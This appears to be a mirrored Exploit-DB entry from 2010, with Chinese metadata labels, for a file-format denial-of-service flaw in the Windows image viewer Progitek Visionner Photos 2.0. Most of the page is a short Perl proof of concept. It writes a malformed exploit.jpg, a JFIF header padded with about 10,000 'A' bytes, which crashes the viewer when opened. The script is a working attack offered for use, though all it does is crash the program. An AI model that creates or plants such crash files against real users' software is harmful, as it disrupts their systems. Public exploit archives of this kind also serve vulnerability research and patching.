Progitek Visionner Photos 2.0 – File Format Denial of Service

  • 作者: antrhacks
    日期: 2010-08-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14545/
  • ================================================
    Progitek Visionner Photos v2.0 - File Format DOS
    ================================================
    
    # Title: Progitek Visionner Photos v2.0 - File Format DOS
    # Author: antrhacks
    # Software Link: http://www.01net.com/outils/telecharger/windows/Multimedia/albmums_et_visionneuses/fiches/tele24929.html
    # Version: 2.00
    # Platform:Windows XP SP3 Home edition Fr
    # Have to place exploit in %HOMEDRIVE%\Program Files\Progitek\VisioPhotos\ by default
    
    
    #!/usr/bin/perl
    
     
    my $file= "exploit.jpg";
     
    my $junk= "ÿØÿà JFIF" . "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" x1019;
    
    open($FILE, ">$file");
    
    print($FILE $junk);
    
    close($FILE);
    
    print("[+] Your Exploit was created successfully");